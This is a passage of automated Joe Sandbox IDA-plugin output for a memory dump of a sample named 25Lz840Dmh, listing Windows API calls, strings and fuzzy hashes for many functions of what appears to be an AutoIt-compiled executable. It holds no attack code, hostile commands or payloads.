                                                  • _wcscmp.LIBCMT ref: 00C4AF8C
                                                  • _wcsstr.LIBCMT ref: 00C4AF9D
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C4AFD5
                                                  • _wcscmp.LIBCMT ref: 00C4AFE5
                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C4B00C
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C4B055
                                                  • _wcscmp.LIBCMT ref: 00C4B065
                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00C4B08D
                                                  • GetWindowRect.USER32(00000004,?), ref: 00C4B0F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                  • String ID: @$ThumbnailClass
                                                  • API String ID: 1788623398-1539354611
                                                  • Opcode ID: 523c29638d78e70615aeef247390bb3a1e884735425550b4fe883a834c0a9cc6
                                                  • Instruction ID: 0b4fd2acef9c858c4e26bf1e17cc5761a4d73302a34735ca88bc9a14d81f1df8
                                                  • Opcode Fuzzy Hash: 523c29638d78e70615aeef247390bb3a1e884735425550b4fe883a834c0a9cc6
                                                  • Instruction Fuzzy Hash: 7981A1711082059FDB15DF54C885FBA7BE8FF44714F04846AFDA98A092DB30DE8ACBA1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                  • API String ID: 1038674560-1810252412
                                                  • Opcode ID: 824dc71bc2674702d7e7c48ac2b2a93db0a426b39bad981866df8955436e9895
                                                  • Instruction ID: eb7923d71b3f0cc848065a432c6eef5dbf265187e9e2d646040c269b76a8bbdb
                                                  • Opcode Fuzzy Hash: 824dc71bc2674702d7e7c48ac2b2a93db0a426b39bad981866df8955436e9895
                                                  • Instruction Fuzzy Hash: 19318631A8820AB6DB14EB60DE53EFE77A4BF12714F6005A5F511720D1EF625F08E652
                                                  APIs
                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00C65013
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00C6501E
                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00C65029
                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00C65034
                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00C6503F
                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00C6504A
                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00C65055
                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00C65060
                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00C6506B
                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00C65076
                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00C65081
                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00C6508C
                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00C65097
                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00C650A2
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00C650AD
                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00C650B8
                                                  • GetCursorInfo.USER32(?), ref: 00C650C8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Cursor$Load$Info
                                                  • String ID:
                                                  • API String ID: 2577412497-0
                                                  • Opcode ID: 39067da53347979c840223a663fe53295675d244bd51e0625acedfa266bf92da
                                                  • Instruction ID: 9c7a1a5c76b7958fd15ab3c0a7da5190cc8e3d61c538c2efae6c946ec7ca6290
                                                  • Opcode Fuzzy Hash: 39067da53347979c840223a663fe53295675d244bd51e0625acedfa266bf92da
                                                  • Instruction Fuzzy Hash: 6C3114B1D0831D6ADF209FB68C8996EBFE8FF04750F50452AE51CE7280DA78A5018F91
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C7A259
                                                  • DestroyWindow.USER32(?,?), ref: 00C7A2D3
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C7A34D
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C7A36F
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C7A382
                                                  • DestroyWindow.USER32(00000000), ref: 00C7A3A4
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BF0000,00000000), ref: 00C7A3DB
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C7A3F4
                                                  • GetDesktopWindow.USER32 ref: 00C7A40D
                                                  • GetWindowRect.USER32(00000000), ref: 00C7A414
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C7A42C
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C7A444
                                                    • Part of subcall function 00BF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BF25EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 1297703922-3619404913
                                                  • Opcode ID: 1aab9ea92b5247853976efa5998bfc49d87b26d60c18a2d84b3462ffaf94324c
                                                  • Instruction ID: 88d788a1f8ac0b32bbd539c88de4c1cac653dff2898898981206e68e61e69399
                                                  • Opcode Fuzzy Hash: 1aab9ea92b5247853976efa5998bfc49d87b26d60c18a2d84b3462ffaf94324c
                                                  • Instruction Fuzzy Hash: 0971BD70140205AFD725DF28CC49F6E7BE5FB89704F04852DF999872A1CBB2EA46CB52
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • DragQueryPoint.SHELL32(?,?), ref: 00C7C627
                                                    • Part of subcall function 00C7AB37: ClientToScreen.USER32(?,?), ref: 00C7AB60
                                                    • Part of subcall function 00C7AB37: GetWindowRect.USER32(?,?), ref: 00C7ABD6
                                                    • Part of subcall function 00C7AB37: PtInRect.USER32(?,?,00C7C014), ref: 00C7ABE6
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C7C690
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C7C69B
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C7C6BE
                                                  • _wcscat.LIBCMT ref: 00C7C6EE
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C7C705
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C7C71E
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00C7C735
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00C7C757
                                                  • DragFinish.SHELL32(?), ref: 00C7C75E
                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C7C851
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                  • API String ID: 169749273-3440237614
                                                  • Opcode ID: 4f6f23cc32c44266c13588bdddea080a4f5bd984e64e9ffd3f68e9192cbdeac7
                                                  • Instruction ID: 6143ce7c0667de72e28da13ae5dbb60177851712ff194e385f1b8d9618585f08
                                                  • Opcode Fuzzy Hash: 4f6f23cc32c44266c13588bdddea080a4f5bd984e64e9ffd3f68e9192cbdeac7
                                                  • Instruction Fuzzy Hash: FC615871108305AFC701EF64DC85EAFBBE8EF89750F00496EF699931A1DB709A49CB52
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00C74424
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C7446F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 3974292440-4258414348
                                                  • Opcode ID: c6cac0e1178c6135018e8084715410c6f9aab796d907222bdad151fc7944f4c9
                                                  • Instruction ID: f3bd78dc8b76542ee9286d79c7864223f1ad956ff46cb3015b55e7e2419b0c3c
                                                  • Opcode Fuzzy Hash: c6cac0e1178c6135018e8084715410c6f9aab796d907222bdad151fc7944f4c9
                                                  • Instruction Fuzzy Hash: A79150702047019FCB08EF20C451A6EB7E1AF96394F1584ACF9A65B3A2CB71ED49EB51
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C7B8B4
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C791C2), ref: 00C7B910
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C7B949
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C7B98C
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C7B9C3
                                                  • FreeLibrary.KERNEL32(?), ref: 00C7B9CF
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C7B9DF
                                                  • DestroyIcon.USER32(?,?,?,?,?,00C791C2), ref: 00C7B9EE
                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C7BA0B
                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C7BA17
                                                    • Part of subcall function 00C12EFD: __wcsicmp_l.LIBCMT ref: 00C12F86
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                  • String ID: .dll$.exe$.icl
                                                  • API String ID: 1212759294-1154884017
                                                  • Opcode ID: 7daba8d6dddc29d4b8106f92ffbd776a86f9c99d6a3c624c3e7b47111ed10ada
                                                  • Instruction ID: ef7205e2d6f232703bae90ef22d4a01a1249949f295e525c7afe75e404c86a04
                                                  • Opcode Fuzzy Hash: 7daba8d6dddc29d4b8106f92ffbd776a86f9c99d6a3c624c3e7b47111ed10ada
                                                  • Instruction Fuzzy Hash: 5A61CE71500209BAEB14DF64CC82FBE7BB8EB08711F108119FA29D61C0DB749E91DBA0
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00C5DCDC
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C5DCEC
                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C5DCF8
                                                  • __wsplitpath.LIBCMT ref: 00C5DD56
                                                  • _wcscat.LIBCMT ref: 00C5DD6E
                                                  • _wcscat.LIBCMT ref: 00C5DD80
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C5DD95
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5DDA9
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5DDDB
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5DDFC
                                                  • _wcscpy.LIBCMT ref: 00C5DE08
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C5DE47
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                  • String ID: *.*
                                                  • API String ID: 3566783562-438819550
                                                  • Opcode ID: 744578f683e7d6ddad2c46461b344a2bf451a7428932c6a073ba896eb82fcf22
                                                  • Instruction ID: 424e5c9315f9fcec982417964a06da5cf060e25e4302773ddcf1e3d4a5a1b08f
                                                  • Opcode Fuzzy Hash: 744578f683e7d6ddad2c46461b344a2bf451a7428932c6a073ba896eb82fcf22
                                                  • Instruction Fuzzy Hash: 49617D765043059FCB20EF20C845EAEB3E8FF89314F04495DF99A87251DB71EA89CB96
                                                  APIs
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • CharLowerBuffW.USER32(?,?), ref: 00C5A3CB
                                                  • GetDriveTypeW.KERNEL32 ref: 00C5A418
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5A460
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5A497
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5A4C5
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                  • API String ID: 2698844021-4113822522
                                                  • Opcode ID: 96ce55c3e6adb7e7857c8ebe09b5061f5d3da143064d723937ffb33c4d138199
                                                  • Instruction ID: d5100a8e1ea46ab35396b5fba42dbc86d4a53dfd93794f57cdcdc21ad9227580
                                                  • Opcode Fuzzy Hash: 96ce55c3e6adb7e7857c8ebe09b5061f5d3da143064d723937ffb33c4d138199
                                                  • Instruction Fuzzy Hash: DD518B751042099FC700EF21C89196AB3E4FF89758F1089ADF89A572A1DB71EE4ECB52
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00C2E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00C4F8DF
                                                  • LoadStringW.USER32(00000000,?,00C2E029,00000001), ref: 00C4F8E8
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  • GetModuleHandleW.KERNEL32(00000000,00CB5310,?,00000FFF,?,?,00C2E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00C4F90A
                                                  • LoadStringW.USER32(00000000,?,00C2E029,00000001), ref: 00C4F90D
                                                  • __swprintf.LIBCMT ref: 00C4F95D
                                                  • __swprintf.LIBCMT ref: 00C4F96E
                                                  • _wprintf.LIBCMT ref: 00C4FA17
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C4FA2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                  • API String ID: 984253442-2268648507
                                                  • Opcode ID: 68d4988c2f945199ef05b637bf6e034bfb694d06f065b72b3306e26cc51cec9a
                                                  • Instruction ID: f7d467ad4c077f49641038bc7a98fe21e83ae99fe38d1c50160ec3f83d732134
                                                  • Opcode Fuzzy Hash: 68d4988c2f945199ef05b637bf6e034bfb694d06f065b72b3306e26cc51cec9a
                                                  • Instruction Fuzzy Hash: 0B412D7284410DAACB15FBE0DD96EFEB7B8AF15300F5000A9B60567092DE715F4DDB61
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C79207,?,?), ref: 00C7BA56
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C79207,?,?,00000000,?), ref: 00C7BA6D
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C79207,?,?,00000000,?), ref: 00C7BA78
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00C79207,?,?,00000000,?), ref: 00C7BA85
                                                  • GlobalLock.KERNEL32(00000000), ref: 00C7BA8E
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C79207,?,?,00000000,?), ref: 00C7BA9D
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00C7BAA6
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00C79207,?,?,00000000,?), ref: 00C7BAAD
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C79207,?,?,00000000,?), ref: 00C7BABE
                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C82CAC,?), ref: 00C7BAD7
                                                  • GlobalFree.KERNEL32(00000000), ref: 00C7BAE7
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00C7BB0B
                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00C7BB36
                                                  • DeleteObject.GDI32(00000000), ref: 00C7BB5E
                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C7BB74
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                  • String ID:
                                                  • API String ID: 3840717409-0
                                                  • Opcode ID: bff91803f14ca8e60bf5d42c33b443cc41909cc9e009caea5165c7a11e44290c
                                                  • Instruction ID: 5275017af6dda0fc54dcb4f1c8384c4ae5f8a0aee01fea022260d249297d7af2
                                                  • Opcode Fuzzy Hash: bff91803f14ca8e60bf5d42c33b443cc41909cc9e009caea5165c7a11e44290c
                                                  • Instruction Fuzzy Hash: 00410575600209AFDB119F65DC88FAEBBB8FB89725F108068F919D7260D7709E42DB60
                                                  APIs
                                                  • __wsplitpath.LIBCMT ref: 00C5DA10
                                                  • _wcscat.LIBCMT ref: 00C5DA28
                                                  • _wcscat.LIBCMT ref: 00C5DA3A
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C5DA4F
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5DA63
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00C5DA7B
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C5DA95
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5DAA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                  • String ID: *.*
                                                  • API String ID: 34673085-438819550
                                                  • Opcode ID: 5f3fdbb107349d8dd11d4dcc9b932964164147b384b12f7fa4ec279974a4e7ac
                                                  • Instruction ID: 252fc148a48684394fd2830db700b50380b34534c936e02e8a3201566e30065a
                                                  • Opcode Fuzzy Hash: 5f3fdbb107349d8dd11d4dcc9b932964164147b384b12f7fa4ec279974a4e7ac
                                                  • Instruction Fuzzy Hash: F381B0795043459FCB34EF65C840AAAB7E4AF89311F14482EFC9AC7251EA30DAC9CB56
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C7C1FC
                                                  • GetFocus.USER32 ref: 00C7C20C
                                                  • GetDlgCtrlID.USER32(00000000), ref: 00C7C217
                                                  • _memset.LIBCMT ref: 00C7C342
                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C7C36D
                                                  • GetMenuItemCount.USER32(?), ref: 00C7C38D
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00C7C3A0
                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C7C3D4
                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C7C41C
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C7C454
                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C7C489
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
